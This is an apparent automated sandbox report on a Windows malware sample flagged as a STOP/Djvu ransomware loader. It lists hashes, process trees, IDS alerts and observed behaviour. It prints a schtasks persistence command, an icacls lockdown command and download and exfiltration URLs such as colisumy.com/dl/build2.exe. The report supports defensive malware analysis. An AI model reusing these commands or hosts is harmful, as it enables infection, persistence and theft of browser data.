Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	May 18, 2023, 9:33 a.m.	May 18, 2023, 9:45 a.m.

Size	741.5KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`c82632236e77359b2aaa32e0cc38cd99`
SHA256	`e69e27dce851bfa86acb2f751f8d28668af08418f9ad2911ec4fe592f7f2ac81`
CRC32	`C205942B`
ssdeep	`12288:KdfL+IhkzIM+n5BX8mHKBNvpG7mqzEmTVTnXrbsd8cPDMhvQ:Kx+2kUb7/q/GVRTVzXXA7`
Yara	UPX_Zero - UPX packed file OS_Processor_Check_Zero - OS Processor Check Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature IsPE32 - (no description)

build.exe "C:\Users\test22\AppData\Local\Temp\build.exe"
884
- build.exe "C:\Users\test22\AppData\Local\Temp\build.exe"
  2052
  - icacls.exe icacls "C:\Users\test22\AppData\Local\0a5dcf08-f922-476c-b2eb-e95d83fc661d" /deny *S-1-1-0:(OI)(CI)(DE,DC)
    2196
  - build.exe "C:\Users\test22\AppData\Local\Temp\build.exe" --Admin IsNotAutoStart IsNotTask
    2252
    - build.exe "C:\Users\test22\AppData\Local\Temp\build.exe" --Admin IsNotAutoStart IsNotTask
      2332
      - build2.exe "C:\Users\test22\AppData\Local\84e150db-10d8-4c8b-ac20-a93aac0b9863\build2.exe"
        2500
        
        build2.exe "C:\Users\test22\AppData\Local\84e150db-10d8-4c8b-ac20-a93aac0b9863\build2.exe"
        2760
      - build3.exe "C:\Users\test22\AppData\Local\84e150db-10d8-4c8b-ac20-a93aac0b9863\build3.exe"
        2552
        
        schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\mstsca.exe"
        2656

Name	Response	Post-Analysis Lookup
colisumy.com	A 109.98.58.98 A 210.182.29.70 A 175.119.10.231 A 211.171.233.126 A 211.59.14.90 A 123.140.161.243 A 186.182.55.44 A 187.212.183.201 A 211.119.84.112 A 190.140.140.75	175.119.10.231
api.2ip.ua	A 162.0.217.254	162.0.217.254
t.me	A 149.154.167.99	149.154.167.99
zexeq.com	A 210.182.29.70 A 201.124.218.111 A 190.219.153.101 A 211.59.14.90 A 183.100.39.157 A 187.212.183.201 A 222.236.49.124 A 2.180.10.7 A 211.171.233.129 A 187.156.17.172	201.124.218.111
steamcommunity.com	A 23.37.146.163	69.192.92.139

IP Address	Status	Action
116.203.165.188	Active	Moloch
123.140.161.243	Active	Moloch
149.154.167.99	Active	Moloch
162.0.217.254	Active	Moloch
164.124.101.2	Active	Moloch
222.236.49.124	Active	Moloch
23.37.146.163	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
UDP 192.168.56.103:52760 -> 164.124.101.2:53	2027026	ET POLICY External IP Address Lookup DNS Query (2ip .ua)	Device Retrieving External IP Address Detected
TCP 162.0.217.254:443 -> 192.168.56.103:49166	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49164 -> 162.0.217.254:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49164 -> 162.0.217.254:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49164 -> 162.0.217.254:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49173 -> 162.0.217.254:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49173 -> 162.0.217.254:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49173 -> 162.0.217.254:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49174 -> 162.0.217.254:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49174 -> 162.0.217.254:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49174 -> 162.0.217.254:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49189 -> 23.37.146.163:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49177 -> 222.236.49.124:80	2002400	ET USER_AGENTS Suspicious User Agent (Microsoft Internet Explorer)	A Network Trojan was detected
TCP 192.168.56.103:49177 -> 222.236.49.124:80	2036334	ET MALWARE Win32/Filecoder.STOP Variant Request for Public Key	A Network Trojan was detected
TCP 222.236.49.124:80 -> 192.168.56.103:49177	2036335	ET MALWARE Win32/Filecoder.STOP Variant Public Key Download	A Network Trojan was detected
TCP 192.168.56.103:49165 -> 162.0.217.254:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49165 -> 162.0.217.254:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49165 -> 162.0.217.254:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
UDP 192.168.56.103:50800 -> 164.124.101.2:53	2027026	ET POLICY External IP Address Lookup DNS Query (2ip .ua)	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49178 -> 123.140.161.243:80	2002400	ET USER_AGENTS Suspicious User Agent (Microsoft Internet Explorer)	A Network Trojan was detected
TCP 192.168.56.103:49178 -> 123.140.161.243:80	2020826	ET MALWARE Potential Dridex.Maldoc Minimal Executable Request	A Network Trojan was detected
TCP 192.168.56.103:49178 -> 123.140.161.243:80	2036333	ET MALWARE Win32/Vodkagats Loader Requesting Payload	A Network Trojan was detected
TCP 192.168.56.103:49186 -> 149.154.167.99:443	2041933	ET INFO Observed Telegram Domain (t .me in TLS SNI)	Misc activity
TCP 192.168.56.103:49186 -> 149.154.167.99:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49186 -> 149.154.167.99:443	2041933	ET INFO Observed Telegram Domain (t .me in TLS SNI)	Misc activity
TCP 123.140.161.243:80 -> 192.168.56.103:49178	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 162.0.217.254:443 -> 192.168.56.103:49175	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49190 -> 116.203.165.188:80	2027262	ET INFO Dotted Quad Host ZIP Request	Potentially Bad Traffic
TCP 192.168.56.103:49179 -> 222.236.49.124:80	2020826	ET MALWARE Potential Dridex.Maldoc Minimal Executable Request	A Network Trojan was detected
TCP 192.168.56.103:49179 -> 222.236.49.124:80	2036333	ET MALWARE Win32/Vodkagats Loader Requesting Payload	A Network Trojan was detected
TCP 222.236.49.124:80 -> 192.168.56.103:49179	2018959	ET POLICY PE EXE or DLL Windows file download HTTP	Potential Corporate Privacy Violation
TCP 149.154.167.99:443 -> 192.168.56.103:49187	2029340	ET INFO TLS Handshake Failure	Potentially Bad Traffic
TCP 192.168.56.103:49185 -> 149.154.167.99:443	2041933	ET INFO Observed Telegram Domain (t .me in TLS SNI)	Misc activity
TCP 192.168.56.103:49185 -> 149.154.167.99:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.103:49185 -> 149.154.167.99:443	2041933	ET INFO Observed Telegram Domain (t .me in TLS SNI)	Misc activity
TCP 192.168.56.103:49173 -> 162.0.217.254:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49185 -> 149.154.167.99:443	2041933	ET INFO Observed Telegram Domain (t .me in TLS SNI)	Misc activity
TCP 192.168.56.103:49164 -> 162.0.217.254:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49174 -> 162.0.217.254:443	2033214	ET INFO Observed External IP Lookup Domain (api .2ip .ua in TLS SNI)	Potentially Bad Traffic
TCP 192.168.56.103:49186 -> 149.154.167.99:443	2041933	ET INFO Observed Telegram Domain (t .me in TLS SNI)	Misc activity

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49189 23.37.146.163:443	C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 Extended Validation Server CA	unknown=US, unknown=Washington, unknown=Private Organization, serialNumber=602 290 773, C=US, ST=Washington, L=Bellevue, O=Valve Corp, CN=store.steampowered.com	b1:30:5e:4c:ee:14:70:87:a7:d7:1c:77:07:b5:3c:2c:99:13:aa:c5

Queries for the computername (11 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 18, 2023, 9:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2023, 9:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2023, 9:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2023, 9:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2023, 9:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 18, 2023, 9:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 18, 2023, 9:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 18, 2023, 9:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2023, 9:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 18, 2023, 9:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 18, 2023, 9:33 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (3 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 18, 2023, 9:33 a.m.			0	0
IsDebuggerPresent May 18, 2023, 9:33 a.m.			0	0
IsDebuggerPresent May 18, 2023, 9:33 a.m.			0	0

Command line console output was observed (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW May 18, 2023, 9:33 a.m.	buffer: SUCCESS: The scheduled task "Azure-Update-Task" has successfully been created. console_handle: 0x00000007	1	1	0

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Tries to locate where the browsers are installed (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 18, 2023, 9:33 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (3 events)

suspicious_features	Connection to IP address	suspicious_request	GET http://116.203.165.188/9dfa7ee730fa2f1efb5ed51dbbec22f5
suspicious_features	Connection to IP address	suspicious_request	GET http://116.203.165.188/config.zip
suspicious_features	POST method with no referer header, Connection to IP address	suspicious_request	POST http://116.203.165.188/

Performs some HTTP requests (7 events)

request	GET http://zexeq.com/raud/get.php?pid=06280D9CD13939E9B7E95CDCAA6A83CC&first=true
request	GET http://colisumy.com/dl/build2.exe
request	GET http://zexeq.com/files/1/build3.exe
request	GET http://116.203.165.188/9dfa7ee730fa2f1efb5ed51dbbec22f5
request	GET http://116.203.165.188/config.zip
request	POST http://116.203.165.188/
request	GET https://steamcommunity.com/profiles/76561199263069598

Sends data using the HTTP POST Method (1 event)

request

POST http://116.203.165.188/

Allocates read-write-execute memory (usually to unpack itself) (10 events)

Time & API	Arguments	Status
NtProtectVirtualMemory May 18, 2023, 9:33 a.m.	process_identifier: 884 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 593920 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a10000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:33 a.m.	process_identifier: 884 region_size: 1159168 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x020a0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 18, 2023, 9:33 a.m.	process_identifier: 2252 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 593920 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00a00000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:33 a.m.	process_identifier: 2252 region_size: 1159168 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00c80000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 18, 2023, 9:33 a.m.	process_identifier: 2500 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 length: 200704 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x009cc000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:33 a.m.	process_identifier: 2500 region_size: 356352 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00930000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:33 a.m.	process_identifier: 2760 region_size: 995328 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x61e00000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:33 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0eff0000 allocation_type: 12289 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:33 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0f000000 allocation_type: 12289 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 18, 2023, 9:33 a.m.	process_identifier: 2760 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0f010000 allocation_type: 12289 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0xffffffff	1

Steals private information from local Internet browsers (50 out of 4713 events)

file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ThirdPartyModuleList64\Local Extension Settings\cjmkndjhnagcfbpiemnkdpomccnjblmj\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\WidevineCdm\4.10.2391.0\_platform_specific\win_x64\widevinecdm.dll.sig\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Local Extension Settings\lpilbniiabackdjcionkobglmddfbcjo\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\4\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Module Info Cache\IndexedDB\chrome-extension_hpglfhgfnhbgpjdenjgmdgoeiappafln_0.indexeddb.leveldb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.47.0_0\_locales\th\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FontLookupTableCache\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ShaderCache\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.47.0_0\_locales\iw\messages.json\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Module Info Cache\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\pnacl\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo\4.2.8_0\_locales\uk\messages.json\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\RecoveryImproved\Local Extension Settings\bgpipimickeadkjlklgciifhnalhdjhe\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TLSDeprecationConfig\Local Extension Settings\epapihdplajcdnnkdeiahlgigofloibg\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\it\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\Local Extension Settings\oeljdldpnmdbchonielidgobddffflal\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Subresource Filter\Local Extension Settings\fmhmiaejopepamlcjkncpgpdjichnecm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crashpad\IndexedDB\chrome-extension_hpglfhgfnhbgpjdenjgmdgoeiappafln_0.indexeddb.leveldb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\zh_CN\messages.json\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek\0.10_0\_locales\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Last Version\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Channel IDs\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Crowd Deny\Sync Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\SSLErrorAssistant\Local Extension Settings\gjagmgiddbbciopjhllkdnddhcglnemk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\BrowserMetrics\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\es_419\messages.json\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Safe Browsing Cookies-journal\Local Extension Settings\oeljdldpnmdbchonielidgobddffflal\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\OriginTrials\Local Extension Settings\fmhmiaejopepamlcjkncpgpdjichnecm\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CrashpadMetrics-active.pma\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.47.0_0\_locales\lo\messages.json\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\1256\_platform_specific\all\sths\03019df3fd85a69a8ebd1facc6da9ba73e469774fe77f579fc5a08b8328c1d6b.sth\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\english_wikipedia.txt\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\GPUCache\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache\data_2\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Local Extension Settings\aijcbedoijmgnlmjeegjaglmepbmpkpi\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\TrustTokenKeyCommitments\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\GrShaderCache\Local Extension Settings\gjagmgiddbbciopjhllkdnddhcglnemk\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\PepperFlash\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflal\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\FileTypePolicies\52\manifest.json\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.47.0_0\_locales\ka\messages.json\Network\Cookies
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\CertificateTransparency\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa\CURRENT
file	C:\Users\test22\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap\1.2_0\_locales\tr\Network\Cookies

Creates executable files on the filesystem (8 events)

file	C:\Users\test22\AppData\Local\84e150db-10d8-4c8b-ac20-a93aac0b9863\build3.exe
file	C:\ProgramData\vcruntime140.dll
file	C:\ProgramData\msvcp140.dll
file	C:\ProgramData\nss3.dll
file	C:\Users\test22\AppData\Local\84e150db-10d8-4c8b-ac20-a93aac0b9863\build2.exe
file	C:\ProgramData\freebl3.dll
file	C:\ProgramData\mozglue.dll
file	C:\ProgramData\softokn3.dll

Drops a binary and executes it (2 events)

file	C:\Users\test22\AppData\Local\84e150db-10d8-4c8b-ac20-a93aac0b9863\build2.exe
file	C:\Users\test22\AppData\Local\84e150db-10d8-4c8b-ac20-a93aac0b9863\build3.exe

Drops an executable to the user AppData folder (2 events)

file	C:\Users\test22\AppData\Local\84e150db-10d8-4c8b-ac20-a93aac0b9863\build3.exe
file	C:\Users\test22\AppData\Local\84e150db-10d8-4c8b-ac20-a93aac0b9863\build2.exe

A process created a hidden window (1 event)

Time & API	Arguments	Status	Return	Repeated
CreateProcessInternalW May 18, 2023, 9:33 a.m.	thread_identifier: 2660 thread_handle: 0x000000ac process_identifier: 2656 current_directory: filepath: C:\Windows\System32\schtasks.exe track: 1 command_line: /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\test22\AppData\Roaming\Microsoft\Network\mstsca.exe" filepath_r: C:\Windows\System32\schtasks.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 0 process_handle: 0x000000b0	1	1	0

Searches running processes potentially to identify processes for sandbox evasion, code injection or memory dumping (12 events)

Time & API	Arguments	Status	Return
Process32NextW May 18, 2023, 9:33 a.m.	snapshot_handle: 0x0000057c process_name: pw.exe process_identifier: 1044	1	1
Process32NextW May 18, 2023, 9:33 a.m.	snapshot_handle: 0x0000057c process_name: taskhost.exe process_identifier: 2000	1	1
Process32NextW May 18, 2023, 9:33 a.m.	snapshot_handle: 0x0000057c process_name: SearchProtocolHost.exe process_identifier: 444	1	1
Process32NextW May 18, 2023, 9:33 a.m.	snapshot_handle: 0x0000057c process_name: SearchFilterHost.exe process_identifier: 1020	1	1
Process32NextW May 18, 2023, 9:33 a.m.	snapshot_handle: 0x0000057c process_name: build.exe process_identifier: 2332	1	1
Process32NextW May 18, 2023, 9:33 a.m.	snapshot_handle: 0x0000057c process_name: svchost.exe process_identifier: 2724	1	1
Process32NextW May 18, 2023, 9:33 a.m.	snapshot_handle: 0x0000057c process_name: mscorsvw.exe process_identifier: 2752	1	1
Process32NextW May 18, 2023, 9:33 a.m.	snapshot_handle: 0x0000057c process_name: build2.exe process_identifier: 2760	1	1
Process32NextW May 18, 2023, 9:33 a.m.	snapshot_handle: 0x0000057c process_name: mscorsvw.exe process_identifier: 2864	1	1
Process32NextW May 18, 2023, 9:33 a.m.	snapshot_handle: 0x0000057c process_name: sppsvc.exe process_identifier: 2940	1	1
Process32NextW May 18, 2023, 9:33 a.m.	snapshot_handle: 0x0000057c process_name: WmiPrvSE.exe process_identifier: 3068	1	1
Process32NextW May 18, 2023, 9:33 a.m.	snapshot_handle: 0x0000057c process_name: 柠 process_identifier: 1534284		0

An executable file was downloaded by the process build.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
InternetReadFile May 18, 2023, 9:33 a.m.	buffer: MZÿÿ¸@ðº´ Í!¸LÍ!This program cannot be run in DOS mode. $eUØ!4¶,!4¶,!4¶,?f#,84¶,?f2, 4¶,?f5,D4¶,òÍ,$4¶,!4·,¡4¶,?f<, 4¶,?f", 4¶,?f', 4¶,Rich!4¶,PELB\×bà .ÞMït@@0RfT2<P°SàQl <@°.textn,. `.data¼=L@2@À.rsrc°SPTL@@.relocÚKàQL @B8z8l8¤8¬4Æ4ä4ø455,5@5T5d5t555ª5º5Ê5à5ð5ü56 64N6b6r666¢6¶6Æ6à6î677B7V7x77¦7¾7Ì7ì7ø78 868H8~4p4T4>6@4Â8Ú8ò8ú89.9F9^9j999¤9°9Ì9ê9ö9 ::2:@:N:\:h:x:::¤:°:Â:Î:Ü:æ:ü:;0;B;T;b;t;;;´;Î;Ú;ì;þ;<8<H<^<D'D=DD³u@£@è@wâ@E´@õ-FdI=1bad allocationÿÿÿÿ@@A@n@8?@ðA@àA@è>@ B@àA@\=@i@àA@string too longinvalid string position¬=@øi@ô=@}k@C@>@!n@n@Unknown exceptionT>@Zq@csmà !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{\|}~=CorExitProcessmscoree.dllruntime error TLOSS error SING error DOMAIN error R6034 An application has made an attempt to load the C runtime library incorrectly. Please contact the application's support team for more information. R6033 - Attempt to use MSIL code from this assembly during native code initialization This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain. R6032 - not enough space for locale information R6031 - Attempt to initialize the CRT more than once. This indicates a bug in your application. R6030 - CRT not initialized R6028 - unable to initialize heap R6027 - not enough space for lowio initialization R6026 - not enough space for stdio initialization R6025 - pure virtual function call R6024 - not enough space for _onexit/atexit table R6019 - unable to open console device R6018 - unexpected heap error R6017 - unexpected multithread lock error R6016 - not enough space for thread data This application has requested the Runtime to terminate it in an unusual way. Please contact the application's support team for more information. R6009 - not enough space for environment R6008 - not enough space for arguments R6002 - floating point support not loaded Microsoft Visual C++ Runtime Library ...<program name unknown>Runtime Error! Program: EncodePointerKERNEL32.DLLDecodePointerFlsFreeFlsSetValueFlsGetValueFlsAllocð?1mm.¹s¿,´)¼¦¹?à'>¼ð?ûi¿¦i<¸øÈ?Àmb¼ð?Z"ê¦¿Õ.Ò? Òu¼ð?Ïk¡\|³¿c©®¦â}Ø?àí,g¼ð?yúsh:¾¿;ö8]+Þ? ^<ð?tyÅ[gÅ¿Èh®9;Çá? Ý%<ð?ý¢«Sþ Í¿Ö %óLä? jh<ð?2ïüyÊ?Í;f æ? 4Ý¼à?Xw$Ì3Á?Ak¼è? áÅ¼à?æ³s¬?£¡)fê?à0ö9<à?N,J¿±½ñ²8ì?±àv¼à?uZEeu¾¿F2Ïkí? æWt<à?-ø¬v1 ¤?Ú-ÆVAî?à±`<Ð?ÕgY¬¿°\÷Ïbï? bu<Ð?P/Ye¡¿&%Ñ£Øï?@ö}¼À?ð?P/Ye¡?&%Ñ£Øï?@ö}¼À¿ request_handle: 0x00cc0010	1	1	0
